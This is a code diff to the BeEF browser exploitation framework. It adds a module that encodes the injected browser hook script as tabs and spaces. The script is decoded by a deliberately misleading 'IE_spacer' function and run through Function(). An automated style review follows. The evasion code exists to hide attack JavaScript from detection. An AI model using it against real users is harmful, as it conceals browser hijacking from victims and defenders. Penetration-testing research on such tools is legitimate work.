diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 8e30ae735..38e48f05c 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -104,8 +104,7 @@ module BeEF
 if config.get("beef.extension.evasion.enable")
 evasion = BeEF::Extension::Evasion::Evasion.instance
- @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
- @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook
+ @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
 else
 @final_hook = ext_js_to_not_obfuscate + @hook
 end
diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml
index 712989a31..7d9db7f91 100644
--- a/extensions/evasion/config.yaml
+++ b/extensions/evasion/config.yaml
@@ -16,7 +16,7 @@
 beef:
 extension:
 evasion:
- enable: true
+ enable: true
 name: 'Evasion'
 authors: ["antisnatchor"]
 exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
@@ -26,4 +26,5 @@ beef:
 beef: "beef"
 Beef: "Beef"
 evercookie: "evercookie"
- chain: ["scramble", "minify"]
+ #chain: ["scramble", "minify"]
+ chain: ["minify", "base64", "whitespace"]
diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb
index ce1fc360e..e7e5c25d5 100644
--- a/extensions/evasion/extension.rb
+++ b/extensions/evasion/extension.rb
@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
 require 'extensions/evasion/obfuscation/scramble'
 require 'extensions/evasion/obfuscation/minify'
 require 'extensions/evasion/obfuscation/base_64'
+require 'extensions/evasion/obfuscation/whitespace'
diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb
new file mode 100644
index 000000000..8c20217f4
--- /dev/null
+++ b/extensions/evasion/obfuscation/whitespace.rb
@@ -0,0 +1,68 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+ module Extension
+ module Evasion
+ class Whitespace
+ include Singleton
+
+ def need_bootstrap
+ true
+ end
+
+ def get_bootstrap
+ # the decode function is in plain text - called IE-spacer - because trolling is always a good idea
+ decode_function =
+"//Dirty IE6 whitespace bug hack
+function IE_spacer(css_space) {
+ var spacer = '';
+ for(y = 0; y < css_space.length/8; y++)
+ {
+ v = 0;
+ for(x = 0; x < 8; x++)
+ {
+ if(css_space.charCodeAt(x+(y*8)) > 9)
+ {
+ v++;
+ }
+ if(x != 7)
+ {
+ v = v << 1;
+ }
+ }
+ spacer += String.fromCharCode(v);
+ }return spacer;
+}"
+ end
+
+ def execute(input, config)
+ size = input.length
+ encoded = encode(input)
+ var_name = BeEF::Extension::Evasion::Helper::random_string(3)
+ input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
+ print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
+ input
+ end
+
+ def encode(input)
+ output = input.unpack('B*')
+ output = output.to_s.gsub(/[\["01\]]/, '[' => '', '"' => '', ']' => '', '0' => "\t", '1' => ' ')
+ output
+ end
+ end
+ end
+ end
+end
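Review bot: `encode` builds its result from `Array#to_s` and then regex-strips the `[`, `"` and `]` that the inspect format adds, so it depends on how the interpreter renders an array; taking the single unpacked element directly is shorter and not version-dependent: `input.unpack('B*').first.tr('01', "\t ")`. In `execute` the `config` parameter is never read and `input` is reassigned to the wrapper string, which hides the original argument; a separate local such as `wrapped` keeps that clearer, and the debug message `#{size}byte of Javascript code` wants `#{size} bytes`. In `get_bootstrap` the `decode_function` local is assigned and never used — the method only returns the string because the assignment is its last expression. The class carries no documentation beyond the license header: a comment on `encode` should state that it maps every bit of the input to a tab (0) or a space (1), and one on `execute` that the emitted wrapper decodes that text with the clear-text `IE_spacer` bootstrap and runs the result through `[].constructor.constructor(...)()`, i.e. `Function(...)()`.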